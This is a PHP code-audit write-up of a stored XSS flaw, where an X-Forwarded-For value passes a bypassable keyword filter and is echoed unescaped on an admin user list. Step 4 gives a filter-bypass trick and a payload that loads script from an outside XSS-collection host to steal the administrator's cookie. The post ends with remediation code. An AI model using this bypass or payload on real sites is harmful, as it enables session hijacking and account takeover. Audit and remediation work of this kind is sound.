
PHP code audit: X-Forwarded-For injection vulnerability

程序员文章站 2024-03-20 08:36:52

Preface:

X-Forwarded-For should be familiar to everyone: it is used to obtain the client's IP address and is used very widely in real applications. The main content of today's post is injecting XSS code through X-Forwarded-For to obtain the administrator's cookie.
The source being audited is the same as in the previous post on the install.php reinstallation vulnerability.

Steps:

1. Visit the normal user login page:
[screenshot: user login page]
2. Locate the corresponding file in the source and audit it; the code is as follows:

<?php
include_once('../sys/config.php');

if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
    $clean_name = clean_input($_POST['user']);
    $clean_pass = clean_input($_POST['pass']);
    $query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
    $data = mysql_query($query, $conn) or die('Error!!');

    if (mysql_num_rows($data) == 1) {
        $row = mysql_fetch_array($data);
        $_SESSION['username'] = $row['user_name'];
        $_SESSION['avatar'] = $row['user_avatar'];
        $ip = sqlwaf(get_client_ip());  // get the client IP address
        $query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
        mysql_query($query, $conn) or die("updata error!");
        header('Location: user.php');
    }
    else {
        $_SESSION['error_info'] = '用户名或密码错误';
        header('Location: login.php');
    }
    mysql_close($conn);
}
else {
    not_find($_SERVER['PHP_SELF']);
}
?>

3. The code above shows that $ip = sqlwaf(get_client_ip()); is what obtains the client IP address, but the value first passes through the sqlwaf() function. Following sqlwaf(), its code is as follows:

function sqlwaf( $str ) {
	$str = str_ireplace( "and", "sqlwaf", $str );
	$str = str_ireplace( "or", "sqlwaf", $str );
	$str = str_ireplace( "from", "sqlwaf", $str );
	$str = str_ireplace( "execute", "sqlwaf", $str );
	$str = str_ireplace( "update", "sqlwaf", $str );
	$str = str_ireplace( "count", "sqlwaf", $str );
	$str = str_ireplace( "chr", "sqlwaf", $str );
	$str = str_ireplace( "mid", "sqlwaf", $str );
	$str = str_ireplace( "char", "sqlwaf", $str );
	$str = str_ireplace( "union", "sqlwaf", $str );
	$str = str_ireplace( "select", "sqlwaf", $str );
	$str = str_ireplace( "delete", "sqlwaf", $str );
	$str = str_ireplace( "insert", "sqlwaf", $str );
	$str = str_ireplace( "limit", "sqlwaf", $str );
	$str = str_ireplace( "concat", "sqlwaf", $str );
	$str = str_ireplace( "script", "sqlwaf", $str );
	$str = str_ireplace( "\\", "\\\\", $str );
	$str = str_ireplace( "&&", "sqlwaf", $str ); 
	$str = str_ireplace( "||", "", $str );
	$str = str_ireplace( "'", "", $str ); 
	$str = str_ireplace( "%", "\%", $str );
	$str = str_ireplace( "_", "\_", $str );
	return $str;
}

4. This filtering code can in fact be bypassed for injection. Take <script>alert(/xss/)</script> as an example: entering <s||cript>alert(/xss/)</s||cript> gets past the sqlwaf() function (work out why for yourself from the sqlwaf() code).
Now that we know how to bypass it, before logging in we use Burp Suite or Modify Headers (a browser extension) to set X-Forwarded-For to: <sCRiPt/SrC=//xsshs.cn/UOZf> (code from my own XSS platform)

Setting the header in Burp Suite:
[screenshot: Burp Suite request with the modified X-Forwarded-For header]
Setting the header with Modify Headers:
[screenshot: Modify Headers configuration]
5. After logging in successfully (everything was set up and audited locally), open the database and check whether the constructed XSS string was written in: it was indeed inserted.
[screenshot: users table with the injected login_ip value]
6. Now switch to the administrator account and log in, and continue the audit to find the admin page that lists users; its code is:

<?php 
include_once('../sys/config.php');

if (isset($_SESSION['admin'])) {
	include_once('../header.php');

	$query = "SELECT * FROM users ORDER BY user_id";
	$data = mysql_query($query, $conn) or die('Error');
	mysql_close($conn);
?>
<table class="items table">
	<thead>
	<tr>
		<th id="yw0_c0">Id</th>
		<th id="yw0_c4">Name</th>
		<th id="yw0_c4">Ip</th>
		<th id="yw0_c4">Manege</th>
	</thead>
	<tbody>
<?php while ($users = mysql_fetch_array($data)) {
	$html_user_name = htmlspecialchars($users['user_name']);
?>
	<tr class="odd">
		<td><?php echo $users['user_id'];?></td>
		<td><?php echo $html_user_name;?></td>
		<td><?php echo $users['login_ip'];?></td>
		<td><a href="delUser.php?id=<?php echo $users['user_id'];?>">删除</a></td>
	</tr>
<?php } ?>
</tbody>
</table>

<a href="manage.php">返回</a>
<?php 
require_once('../footer.php');
}
else {
	not_find($_SERVER['PHP_SELF']);
}
 ?>

7. As the code above shows, <?php echo $users['login_ip'];?> echoes the value straight from the database without any filtering, so it is rendered when the administrator opens the page.
8. The XSS fires:
[screenshot: alert triggered on the admin user list]
9. What remains is logging into the back end with the captured cookie; that is not demonstrated here since it is all routine.

Fix:

Add XSS filtering to sqlwaf(), for example HTML entity encoding.
Apply strict filtering when the administrator page displays user information.
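The root cause in steps 4 and 7 is that sqlwaf() is a keyword blacklist (its replacements run in a fixed order, so a keyword split by a string that is stripped later is never matched), and that login_ip is echoed raw. The following is an added example, not the audited project's code, of how a defender would replace that pattern: validate the header as an IP literal (allow-list), store it with a prepared statement, and encode at the output boundary. The table and column names users, login_ip and user_id are taken from the audited code; the trusted-proxy list, the PDO handle $pdo and the function names are assumptions.

```php
<?php
// Added example (not the audited project's code).
// Assumed: $pdo is an open PDO connection to the same database as config.php.

// Allow-list validation: the value is either a valid IPv4/IPv6 literal or it is
// rejected outright. No keyword blacklist is involved, so there is nothing for a
// split keyword such as "s||cript" to bypass.
function get_client_ip_safe(array $server): string
{
    // X-Forwarded-For is only meaningful when a trusted reverse proxy set it;
    // from any other peer the header is attacker-controlled and must be ignored.
    // The trusted proxy list is an assumption for this example.
    $trusted_proxies = ['127.0.0.1', '10.0.0.1'];
    $remote = $server['REMOTE_ADDR'] ?? '';

    if (in_array($remote, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // XFF is a comma-separated chain; the first entry is the original client.
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim($parts[0]);
    } else {
        $candidate = $remote;
    }

    // filter_var() returns the IP string on success and false otherwise.
    $ip = filter_var($candidate, FILTER_VALIDATE_IP);

    // Never store an unvalidated value; fall back to a fixed placeholder.
    return $ip === false ? '0.0.0.0' : $ip;
}

// Store through a prepared statement so the value is bound as data, never
// concatenated into the SQL text as the audited UPDATE does.
function store_login_ip(PDO $pdo, int $user_id, string $ip): void
{
    $stmt = $pdo->prepare('UPDATE users SET login_ip = :ip WHERE user_id = :id');
    $stmt->execute([':ip' => $ip, ':id' => $user_id]);
}

// Encode at the output boundary. Even a row that was poisoned before the fix
// is rendered as inert text, which is the second fix the post calls for.
function render_ip_cell(string $login_ip): string
{
    return '<td>' . htmlspecialchars($login_ip, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Self-check on constructed request environments (not real traffic):
$samples = [
    // trusted proxy, well-formed chain: first hop is taken
    ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => '203.0.113.7, 10.0.0.1'],
    // trusted proxy, header carries markup instead of an address: rejected
    ['REMOTE_ADDR' => '10.0.0.1', 'HTTP_X_FORWARDED_FOR' => '<b>not-an-ip</b>'],
    // untrusted peer: the header is ignored and REMOTE_ADDR is used
    ['REMOTE_ADDR' => '198.51.100.9', 'HTTP_X_FORWARDED_FOR' => '203.0.113.7'],
];
foreach ($samples as $server) {
    echo get_client_ip_safe($server), PHP_EOL;
}

// A previously stored value containing markup comes out entity-encoded.
echo render_ip_cell('<b>legacy</b>'), PHP_EOL;
```

Two points are worth keeping in mind when applying this to the audited code. First, validating the header only helps if the application also decides which peers are allowed to set it; a validated but spoofed address is still the wrong address, so the REMOTE_ADDR check is part of the fix, not an optional extra. Second, the output encoding in render_ip_cell() is independent of the input validation and should stay even once every stored value is a clean IP, because the admin page is where the injected value actually executes.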